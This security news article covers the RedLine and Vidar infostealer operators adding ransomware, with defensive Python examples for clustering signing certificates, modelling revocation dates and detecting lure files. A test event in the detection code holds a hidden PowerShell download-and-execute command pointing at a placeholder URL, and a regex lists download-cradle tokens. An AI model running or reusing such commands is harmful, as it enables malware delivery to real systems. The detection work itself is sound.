Stealer Thugs Responsible for RedLine & Vidar Pivot to Ransomware

In a concerning development, two cybercriminal groups known for spreading infostealers have expanded their operations to include ransomware. The operators behind the RedLine and Vidar stealer malware are now delivering ransomware payloads through the same phishing campaigns they use for their stealers, and they have been signing their stealer payloads with code-signing certificates. A valid signature helps the payloads slip past security controls that extend trust to signed executables, making delivery easier.

Researchers from Trend Micro uncovered this shift while studying a single victim who first received infostealer samples signed with Extended Validation (EV) code-signing certificates and later began receiving ransomware payloads over the same delivery channels. EV code-signing certificates are issued only to organizations whose legal and physical existence has been verified, a more rigorous vetting process than that applied to standard code-signing certificates, which is why security products tend to grant EV-signed binaries more trust.

According to the researchers, the threat actors are streamlining their operations and reusing the same techniques for multiple purposes. Trend Micro identified 30 EV code-signed samples tied to this victim between July and August of this year. Every infostealer sample carried a different hash, so the malware behaves polymorphically and defeats detection that relies on matching known hashes; across the set, the shared signing certificate rather than the file hash is the stable artifact.

This is the first time the researchers have observed a single threat actor using so many EV code-signed samples. How the actor obtained the private key remains unknown, but abuse of code-signing certificates is not uncommon: attackers routinely sign malware with stolen certificates and keys so that it appears legitimate.
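Because each sample has a unique hash while the certificate stays constant, a practical hunt pivots on the signer rather than the file. The following is an added example, not code from Trend Micro or from the original article: it groups signed-sample metadata by certificate thumbprint and flags any signer whose key produced an unusual number of distinct binaries inside a short window. The hashes, thumbprints and dates are constructed placeholders, and the 60-day window and threshold of five distinct hashes are assumptions to tune against your own telemetry.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample metadata: (sha256 placeholder, signer certificate thumbprint
# placeholder, signing date). None of these values are real indicators.
SAMPLES = [
    # One certificate, eight different binaries in six weeks (the abuse pattern).
    ("a1", "THUMB-A", "2023-07-03"), ("a2", "THUMB-A", "2023-07-05"),
    ("a3", "THUMB-A", "2023-07-11"), ("a4", "THUMB-A", "2023-07-19"),
    ("a5", "THUMB-A", "2023-07-26"), ("a6", "THUMB-A", "2023-08-02"),
    ("a7", "THUMB-A", "2023-08-09"), ("a8", "THUMB-A", "2023-08-15"),
    # A vendor that re-signs the same build and ships a new one months later.
    ("b1", "THUMB-B", "2023-01-10"), ("b1", "THUMB-B", "2023-06-10"),
    ("b2", "THUMB-B", "2023-09-01"),
    # A slow, steady release cadence: one new binary every four months.
    ("c1", "THUMB-C", "2022-01-01"), ("c2", "THUMB-C", "2022-05-01"),
    ("c3", "THUMB-C", "2022-09-01"), ("c4", "THUMB-C", "2023-01-01"),
    ("c5", "THUMB-C", "2023-05-01"), ("c6", "THUMB-C", "2023-09-01"),
]


def max_distinct_in_window(events, window_days):
    """events: iterable of (datetime, sha256). Returns the largest number of
    distinct hashes whose signing times fall inside any span of window_days days."""
    events = sorted(events)
    live = Counter()          # hashes currently inside the sliding window
    best = lo = 0
    for t_hi, h_hi in events:
        live[h_hi] += 1
        # Slide the left edge forward until the window is at most window_days wide.
        while t_hi - events[lo][0] > timedelta(days=window_days):
            h_lo = events[lo][1]
            live[h_lo] -= 1
            if live[h_lo] == 0:
                del live[h_lo]
            lo += 1
        best = max(best, len(live))
    return best


def flag_abused_signers(samples, window_days=60, threshold=5):
    """Group samples by signer thumbprint and report signers whose certificate
    produced at least `threshold` distinct hashes within any window_days-day window."""
    by_signer = defaultdict(list)
    for sha, thumb, day in samples:
        by_signer[thumb].append((datetime.strptime(day, "%Y-%m-%d"), sha))
    flagged = {}
    for thumb, events in by_signer.items():
        n = max_distinct_in_window(events, window_days)
        if n >= threshold:
            flagged[thumb] = n
    return flagged


if __name__ == "__main__":
    print(flag_abused_signers(SAMPLES))   # {'THUMB-A': 8}
```

The sliding window matters: a legitimate publisher can accumulate many distinct signed hashes over years, so counting distinct hashes per certificate without a time bound produces noise. Once a signer is flagged, the thumbprint (or the certificate serial number) is the indicator to block and to query for retrospectively.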

In response to the exposure created by this kind of abuse, the CA/Browser Forum (CABF) has made hardware-backed key generation mandatory for standard code-signing certificates, a requirement that previously applied only to EV certificates. The aim is to protect the private key: a key generated and held in hardware cannot be exported or copied off the machine as a file, so stealing it from a compromised developer workstation becomes far harder. The certificate itself is public; only the private key needs this protection.

Trend Micro's investigation also found that revocation initially failed to invalidate the infostealer's signatures. The certificate authority (CA) had set the revocation date to the date the abuse was reported, and Authenticode signatures that carry a trusted timestamp remain valid as long as the timestamp predates the revocation date, so every sample signed before the report stayed trusted. The researchers notified the CA and recommended revoking the certificate with its issuance date as the revocation date instead. The CA did so, which invalidated every signature made with that certificate after the corrected revocation date, that is, all of them.
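The revocation-date pitfall is easy to state and easy to get wrong, so here is an added example, not from the original article or from Trend Micro, that models how a timestamped signature is evaluated against a certificate's validity period and revocation date. The certificate dates, signing timestamps and report date are constructed placeholders; the model is deliberately simplified (it ignores CRL/OCSP fetching, chain building and timestamp-authority trust) and treats the boundary case of a timestamp equal to the revocation date as untrusted.

```python
from datetime import datetime


def d(s):
    """Shorthand for building datetimes from ISO date strings."""
    return datetime.fromisoformat(s)


# Constructed certificate validity period; placeholder dates, not a real certificate.
CERT = {"not_before": d("2023-06-01"), "not_after": d("2024-06-01")}


def signature_trusted(sig_timestamp, revoked_at, now, cert=CERT):
    """Simplified model of how Authenticode treats a signing certificate.

    sig_timestamp: datetime of the RFC 3161 countersignature, or None if the
                   signature was never timestamped.
    revoked_at:    revocation date published by the CA, or None if not revoked.
    now:           the time at which verification is happening.

    A timestamped signature is evaluated as of the timestamp, so it survives a
    revocation dated after it; an untimestamped signature is evaluated as of
    `now`, so any revocation (or expiry) before `now` invalidates it.
    """
    eval_time = sig_timestamp if sig_timestamp is not None else now
    if not (cert["not_before"] <= eval_time <= cert["not_after"]):
        return False                      # outside the certificate's validity period
    if revoked_at is not None and eval_time >= revoked_at:
        return False                      # signed at or after the revocation date
    return True


def count_trusted(signing_times, revoked_at, now, cert=CERT):
    """How many of the given signatures a verifier would still accept."""
    return sum(signature_trusted(t, revoked_at, now, cert) for t in signing_times)


# Constructed signing timestamps for a run of signed samples, plus one
# signature that was never timestamped.
SIGNATURES = [d("2023-07-03"), d("2023-07-20"), d("2023-08-09"), None]
REPORTED = d("2023-09-01")   # day the abuse was reported to the CA
NOW = d("2023-09-15")

if __name__ == "__main__":
    # Revoked as of the report date: every timestamped sample stays trusted.
    print(count_trusted(SIGNATURES, REPORTED, NOW))             # 3
    # Revoked as of issuance: nothing signed with the key is trusted any more.
    print(count_trusted(SIGNATURES, CERT["not_before"], NOW))   # 0
```

The practical rule for a CA handling a key-compromise report is that the revocation date must be no later than the earliest signature that should be distrusted; when the whole key is suspect, that means the issuance date. For defenders, a signature that verifies cleanly today is not evidence the binary was ever legitimate, only that it was timestamped before the published revocation date.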

The campaign investigated by Trend Micro began with socially engineered spear-phishing emails that pressed the victim to act urgently on topics such as health matters and hotel accommodations. Those earlier campaigns delivered infostealer payloads. Then, on August 9, the victim received a ransomware payload after being tricked into downloading and opening an attachment from a fake TripAdvisor complaint email; the attachment posed as a benign .pdf but was actually a malicious .htm file that kicked off a chain of processes ending in ransomware deployment.

Notably, while the initial infostealer payloads carried EV signatures, the files used to drop the ransomware did not; they nonetheless came from the same threat actor and arrived through the same delivery method. The researchers observed LNK files containing commands that launched the malicious files, a technique that helps evade detection, and found that the actors staged these files on Google Drive, getting past the platform's built-in malware scanning.
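Two of the tradecraft details above are detectable on the endpoint without any hash: a lure whose document-looking extension is followed by an executable one (the .pdf that is really an .htm), and a shortcut that, when double-clicked, makes explorer.exe spawn a script interpreter with download-and-execute arguments. The following is an added example, not code from the original article or from Trend Micro, that runs both checks over constructed file-write and process-creation events. Note that a shortcut launched by double-click usually does not appear on the child's command line, so the second rule keys on the parent/child pair and argument tokens rather than on the .lnk path; the event field names, the extension lists and the argument patterns are assumptions to adapt to your own telemetry schema.

```python
import re
from pathlib import PureWindowsPath

# Document-like extensions an attacker hides behind, and the executable ones
# that actually run. Both lists are assumptions; extend them for your estate.
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png", ".txt"}
EXEC_EXTS = {".htm", ".html", ".lnk", ".exe", ".scr", ".js", ".vbs", ".hta", ".bat", ".cmd"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Argument tokens typical of a shortcut-driven download cradle.
SUSPICIOUS_ARGS = re.compile(
    r"(-w(indowstyle)?\s+hidden"
    r"|-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"
    r"|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b"
    r"|certutil.*-urlcache|bitsadmin|start\s+/min)",
    re.IGNORECASE,
)


def deceptive_double_extension(filename: str) -> bool:
    """True for names like complaint.pdf.htm: a decoy extension followed by an executable one."""
    suffixes = [s.lower() for s in PureWindowsPath(filename).suffixes]
    return len(suffixes) >= 2 and suffixes[-2] in DECOY_EXTS and suffixes[-1] in EXEC_EXTS


def lnk_style_launch(event: dict) -> bool:
    """True when a user-driven launch (parent explorer.exe) starts a shell or
    script host with arguments that look like a download cradle."""
    parent = PureWindowsPath(event["parent_image"]).name.lower()
    child = PureWindowsPath(event["image"]).name.lower()
    return (parent == "explorer.exe"
            and child in SHELLS
            and SUSPICIOUS_ARGS.search(event["command_line"]) is not None)


def triage(events):
    """Run both checks over a stream of constructed endpoint events."""
    findings = []
    for ev in events:
        if ev["type"] == "file_write" and deceptive_double_extension(ev["path"]):
            findings.append(("double_extension", ev["path"]))
        elif ev["type"] == "process_create" and lnk_style_launch(ev):
            findings.append(("shell_from_explorer", ev["command_line"]))
    return findings


# Constructed events; paths, names and the URL are placeholders, not real indicators.
EVENTS = [
    {"type": "file_write", "path": r"C:\Users\victim\Downloads\TripAdvisor-Complaint.pdf.htm"},
    {"type": "file_write", "path": r"C:\Users\victim\Downloads\Q3-report.pdf"},
    {"type": "process_create", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -c \"iex (New-Object Net.WebClient)"
                     ".DownloadString('https://drive.google.com/uc?id=EXAMPLE')\""},
    {"type": "process_create", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c dir"},
    # Same hidden-window flag, but launched by a service rather than a user click.
    {"type": "process_create", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -w hidden -file C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for kind, detail in triage(EVENTS):
        print(kind, detail)
```

The parent filter is what keeps the second rule quiet: hidden-window PowerShell launched by a scheduler or a service is everyday administration, while the same arguments under explorer.exe mean a person opened something. Google Drive and the signing certificate do not appear in these rules at all, which is the point; both can change between campaigns, whereas the user-click-to-interpreter chain is hard for the attacker to avoid.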

Trend Micro warns that individuals and organizations targeted by infostealer campaigns should expect ransomware attacks to follow. The researchers stress configuring and keeping up to date attack-surface protections so that malicious items are removed before they reach users; early detection and mitigation deny the actors the information they need to stage a ransomware attack. Users should also avoid downloading files, programs, and software from unverified sources and websites.

Cybercriminals continue to refine their tactics to maximize impact. Organizations and individuals must stay vigilant, keep their security measures current, and treat emails and files from unknown sources with caution. Staying informed and adopting proactive security measures keeps the risk posed by these threats manageable.
